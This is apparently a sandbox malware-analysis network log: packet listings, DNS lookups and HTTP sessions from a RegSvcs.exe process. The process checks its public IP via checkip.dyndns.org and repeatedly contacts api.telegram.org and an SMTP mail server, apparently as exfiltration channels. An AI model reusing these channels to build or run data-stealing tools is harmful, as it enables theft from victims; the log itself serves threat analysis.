                                                                          Sep 19, 2024 12:24:59.875351906 CEST58761705208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:59.875427008 CEST61705587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:25:00.162880898 CEST58761703208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:25:00.163022995 CEST61703587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:25:00.168020010 CEST58761703208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:25:00.318497896 CEST58761703208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:25:00.318825006 CEST61703587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:25:00.324210882 CEST58761703208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:25:00.444258928 CEST58761705208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:25:00.444766998 CEST61705587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:25:00.449810028 CEST58761705208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:25:00.492597103 CEST58761703208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:25:00.495663881 CEST61703587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:25:00.498008013 CEST61706443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:25:00.498104095 CEST44361706149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:25:00.498261929 CEST61706443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:25:00.498457909 CEST61706443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:25:00.498481035 CEST44361706149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:25:00.501319885 CEST58761703208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:25:00.504518986 CEST61703587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:25:00.607256889 CEST58761705208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:25:00.612689972 CEST61705587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:25:00.617810965 CEST58761705208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:25:00.775782108 CEST58761705208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:25:00.776370049 CEST61705587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:25:00.782042980 CEST58761705208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:25:01.131002903 CEST44361706149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:25:01.132349968 CEST61706443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:25:01.132397890 CEST44361706149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:25:01.132544041 CEST61706443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:25:01.132558107 CEST44361706149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:25:01.457761049 CEST44361706149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:25:01.458092928 CEST44361706149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:25:01.458151102 CEST61706443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:25:01.458606005 CEST61706443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:25:01.460458040 CEST61707587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:25:01.465445995 CEST58761707208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:25:01.465539932 CEST61707587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:25:02.014466047 CEST58761707208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:25:02.044926882 CEST61707587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:25:02.049971104 CEST58761707208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:25:02.199963093 CEST58761707208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:25:02.201107979 CEST61707587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:25:02.206340075 CEST58761707208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:25:02.362487078 CEST58761707208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:25:02.364624977 CEST61707587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:25:02.374907017 CEST58761707208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:25:02.486083031 CEST58761705208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:25:02.488866091 CEST61705587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:25:02.495697975 CEST58761705208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:25:02.901062012 CEST61707587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:25:02.903883934 CEST61708443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:25:02.903939962 CEST44361708149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:25:02.904103041 CEST61708443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:25:02.904309034 CEST61708443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:25:02.904336929 CEST44361708149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:25:02.969680071 CEST58761707208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:25:02.969801903 CEST61707587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:25:03.213511944 CEST61705587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:25:03.216811895 CEST61709443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:25:03.216860056 CEST44361709149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:25:03.216914892 CEST61709443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:25:03.217200041 CEST61709443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:25:03.217211008 CEST44361709149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:25:03.220612049 CEST58761705208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:25:03.220664978 CEST61705587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:25:03.606441975 CEST44361708149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:25:03.608589888 CEST61708443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:25:03.608669043 CEST44361708149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:25:03.608733892 CEST61708443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:25:03.608756065 CEST44361708149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:25:03.839960098 CEST44361709149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:25:03.842178106 CEST61709443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:25:03.842200041 CEST44361709149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:25:03.842278957 CEST61709443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:25:03.842284918 CEST44361709149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:25:03.949505091 CEST44361708149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:25:03.949677944 CEST44361708149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:25:03.949749947 CEST61708443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:25:03.950216055 CEST61708443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:25:03.951628923 CEST61710587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:25:03.956767082 CEST58761710208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:25:03.956842899 CEST61710587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:25:04.141993046 CEST44361709149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:25:04.142086029 CEST44361709149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:25:04.142347097 CEST61709443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:25:04.142641068 CEST61709443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:25:04.144448042 CEST61711587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:25:04.157085896 CEST58761711208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:25:04.157179117 CEST61711587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:25:09.782895088 CEST61711587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:25:09.784862041 CEST61712443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:25:09.784972906 CEST44361712149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:25:09.785068989 CEST61712443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:25:09.785296917 CEST61712443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:25:09.785332918 CEST44361712149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:25:09.789333105 CEST61710587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:25:09.791264057 CEST61713443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:25:09.791301966 CEST44361713149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:25:09.791388988 CEST61713443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:25:09.791690111 CEST61713443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:25:09.791704893 CEST44361713149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:25:10.090672970 CEST58761711208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:25:10.090706110 CEST58761710208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:25:10.090778112 CEST61710587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:25:10.090857983 CEST61711587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:25:10.690184116 CEST44361713149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:25:10.692464113 CEST61713443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:25:10.692492962 CEST44361713149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:25:10.692676067 CEST61713443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:25:10.692682981 CEST44361713149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:25:10.703228951 CEST44361712149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:25:10.705287933 CEST61712443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:25:10.705363989 CEST44361712149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:25:10.705666065 CEST61712443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:25:10.705679893 CEST44361712149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:25:10.984728098 CEST44361713149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:25:10.984920979 CEST44361713149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:25:10.985055923 CEST61713443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:25:10.985394001 CEST61713443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:25:10.985852957 CEST61714587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:25:10.990655899 CEST58761714208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:25:10.990840912 CEST61714587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:25:11.031718969 CEST44361712149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:25:11.031790018 CEST44361712149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:25:11.031963110 CEST61712443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:25:11.032473087 CEST61712443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:25:11.033911943 CEST61715587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:25:11.038784981 CEST58761715208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:25:11.039412022 CEST61715587192.168.2.5208.91.198.143
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Sep 19, 2024 12:21:05.400042057 CEST5615453192.168.2.51.1.1.1
                                                                          Sep 19, 2024 12:21:05.406950951 CEST53561541.1.1.1192.168.2.5
                                                                          Sep 19, 2024 12:21:07.358653069 CEST5581253192.168.2.51.1.1.1
                                                                          Sep 19, 2024 12:21:07.366575003 CEST53558121.1.1.1192.168.2.5
                                                                          Sep 19, 2024 12:21:19.718935966 CEST5299153192.168.2.51.1.1.1
                                                                          Sep 19, 2024 12:21:19.728554964 CEST53529911.1.1.1192.168.2.5
                                                                          Sep 19, 2024 12:21:35.147201061 CEST6433853192.168.2.51.1.1.1
                                                                          Sep 19, 2024 12:21:35.155911922 CEST53643381.1.1.1192.168.2.5
                                                                          Sep 19, 2024 12:21:36.923407078 CEST5363927162.159.36.2192.168.2.5
                                                                          Sep 19, 2024 12:21:37.441477060 CEST6214653192.168.2.51.1.1.1
                                                                          Sep 19, 2024 12:21:37.452467918 CEST53621461.1.1.1192.168.2.5
                                                                          Sep 19, 2024 12:21:39.735891104 CEST6304753192.168.2.51.1.1.1
                                                                          Sep 19, 2024 12:21:39.743344069 CEST53630471.1.1.1192.168.2.5
                                                                          Sep 19, 2024 12:21:42.827052116 CEST5858653192.168.2.51.1.1.1
                                                                          Sep 19, 2024 12:21:42.834301949 CEST53585861.1.1.1192.168.2.5
                                                                          Sep 19, 2024 12:23:07.868227959 CEST6410253192.168.2.51.1.1.1
                                                                          Sep 19, 2024 12:23:07.877660036 CEST53641021.1.1.1192.168.2.5
                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Sep 19, 2024 12:21:05.400042057 CEST192.168.2.51.1.1.10xe4b3Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                          Sep 19, 2024 12:21:07.358653069 CEST192.168.2.51.1.1.10x2841Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                          Sep 19, 2024 12:21:19.718935966 CEST192.168.2.51.1.1.10x7dd8Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                          Sep 19, 2024 12:21:35.147201061 CEST192.168.2.51.1.1.10xfc1dStandard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)false
                                                                          Sep 19, 2024 12:21:37.441477060 CEST192.168.2.51.1.1.10xf03eStandard query (0)206.23.85.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                          Sep 19, 2024 12:21:39.735891104 CEST192.168.2.51.1.1.10x29c9Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)false
                                                                          Sep 19, 2024 12:21:42.827052116 CEST192.168.2.51.1.1.10x13dfStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                          Sep 19, 2024 12:23:07.868227959 CEST192.168.2.51.1.1.10xcd3aStandard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)false
                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Sep 19, 2024 12:21:05.406950951 CEST1.1.1.1192.168.2.50xe4b3No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                          Sep 19, 2024 12:21:05.406950951 CEST1.1.1.1192.168.2.50xe4b3No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                          Sep 19, 2024 12:21:05.406950951 CEST1.1.1.1192.168.2.50xe4b3No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                          Sep 19, 2024 12:21:05.406950951 CEST1.1.1.1192.168.2.50xe4b3No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                          Sep 19, 2024 12:21:05.406950951 CEST1.1.1.1192.168.2.50xe4b3No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                          Sep 19, 2024 12:21:05.406950951 CEST1.1.1.1192.168.2.50xe4b3No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                          Sep 19, 2024 12:21:07.366575003 CEST1.1.1.1192.168.2.50x2841No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                          Sep 19, 2024 12:21:07.366575003 CEST1.1.1.1192.168.2.50x2841No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                          Sep 19, 2024 12:21:19.728554964 CEST1.1.1.1192.168.2.50x7dd8No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                          Sep 19, 2024 12:21:35.155911922 CEST1.1.1.1192.168.2.50xfc1dNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                          Sep 19, 2024 12:21:35.155911922 CEST1.1.1.1192.168.2.50xfc1dNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                          Sep 19, 2024 12:21:35.155911922 CEST1.1.1.1192.168.2.50xfc1dNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                          Sep 19, 2024 12:21:35.155911922 CEST1.1.1.1192.168.2.50xfc1dNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                          Sep 19, 2024 12:21:37.452467918 CEST1.1.1.1192.168.2.50xf03eName error (3)206.23.85.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                          Sep 19, 2024 12:21:39.743344069 CEST1.1.1.1192.168.2.50x29c9No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                          Sep 19, 2024 12:21:39.743344069 CEST1.1.1.1192.168.2.50x29c9No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                          Sep 19, 2024 12:21:39.743344069 CEST1.1.1.1192.168.2.50x29c9No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                          Sep 19, 2024 12:21:39.743344069 CEST1.1.1.1192.168.2.50x29c9No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                          Sep 19, 2024 12:21:42.834301949 CEST1.1.1.1192.168.2.50x13dfNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                          Sep 19, 2024 12:23:07.877660036 CEST1.1.1.1192.168.2.50xcd3aNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                          Sep 19, 2024 12:23:07.877660036 CEST1.1.1.1192.168.2.50xcd3aNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                          Sep 19, 2024 12:23:07.877660036 CEST1.1.1.1192.168.2.50xcd3aNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                          Sep 19, 2024 12:23:07.877660036 CEST1.1.1.1192.168.2.50xcd3aNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                          • reallyfreegeoip.org
                                                                          • api.telegram.org
                                                                          • checkip.dyndns.org
                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.549704132.226.247.73801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 19, 2024 12:21:05.422763109 CEST151OUTGET / HTTP/1.1
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                          Host: checkip.dyndns.org
                                                                          Connection: Keep-Alive
                                                                          Sep 19, 2024 12:21:06.085481882 CEST320INHTTP/1.1 200 OK
                                                                          Date: Thu, 19 Sep 2024 10:21:05 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 103
                                                                          Connection: keep-alive
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          X-Request-ID: 76a215cbfdab033f7abe6ca44656f391
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                          Sep 19, 2024 12:21:06.091797113 CEST127OUTGET / HTTP/1.1
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                          Host: checkip.dyndns.org
                                                                          Sep 19, 2024 12:21:07.297427893 CEST320INHTTP/1.1 200 OK
                                                                          Date: Thu, 19 Sep 2024 10:21:07 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 103
                                                                          Connection: keep-alive
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          X-Request-ID: 4ea0338291f5db359c8a70c0aa53f97f
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                          Sep 19, 2024 12:21:09.071471930 CEST127OUTGET / HTTP/1.1
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                          Host: checkip.dyndns.org
                                                                          Sep 19, 2024 12:21:09.275693893 CEST320INHTTP/1.1 200 OK
                                                                          Date: Thu, 19 Sep 2024 10:21:09 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 103
                                                                          Connection: keep-alive
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          X-Request-ID: 30dc30abc22cb38ee89fdcb5639a8127
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.549707132.226.247.73801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 19, 2024 12:21:09.918914080 CEST127OUTGET / HTTP/1.1
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                          Host: checkip.dyndns.org
                                                                          Sep 19, 2024 12:21:10.583904028 CEST320INHTTP/1.1 200 OK
                                                                          Date: Thu, 19 Sep 2024 10:21:10 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 103
                                                                          Connection: keep-alive
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          X-Request-ID: b3511a3787176c7ab927fd1d9a93c134
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.549709132.226.247.73801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 19, 2024 12:21:11.239732981 CEST127OUTGET / HTTP/1.1
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                          Host: checkip.dyndns.org
                                                                          Sep 19, 2024 12:21:11.991666079 CEST320INHTTP/1.1 200 OK
                                                                          Date: Thu, 19 Sep 2024 10:21:11 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 103
                                                                          Connection: keep-alive
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          X-Request-ID: 565188367cdc1873b4cd50c26c81ab98
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.2.549711132.226.247.73801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 19, 2024 12:21:12.596837044 CEST151OUTGET / HTTP/1.1
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                          Host: checkip.dyndns.org
                                                                          Connection: Keep-Alive
                                                                          Sep 19, 2024 12:21:13.619724989 CEST320INHTTP/1.1 200 OK
                                                                          Date: Thu, 19 Sep 2024 10:21:13 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 103
                                                                          Connection: keep-alive
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          X-Request-ID: cd5fb25339e165271577a93454bc3ed0
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                          Sep 19, 2024 12:21:13.620918989 CEST320INHTTP/1.1 200 OK
                                                                          Date: Thu, 19 Sep 2024 10:21:13 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 103
                                                                          Connection: keep-alive
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          X-Request-ID: cd5fb25339e165271577a93454bc3ed0
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          4192.168.2.549713132.226.247.73801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 19, 2024 12:21:14.221731901 CEST151OUTGET / HTTP/1.1
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                          Host: checkip.dyndns.org
                                                                          Connection: Keep-Alive
                                                                          Sep 19, 2024 12:21:14.925029039 CEST320INHTTP/1.1 200 OK
                                                                          Date: Thu, 19 Sep 2024 10:21:14 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 103
                                                                          Connection: keep-alive
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          X-Request-ID: af0c5f3dd991eb488223ad67062cedc9
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
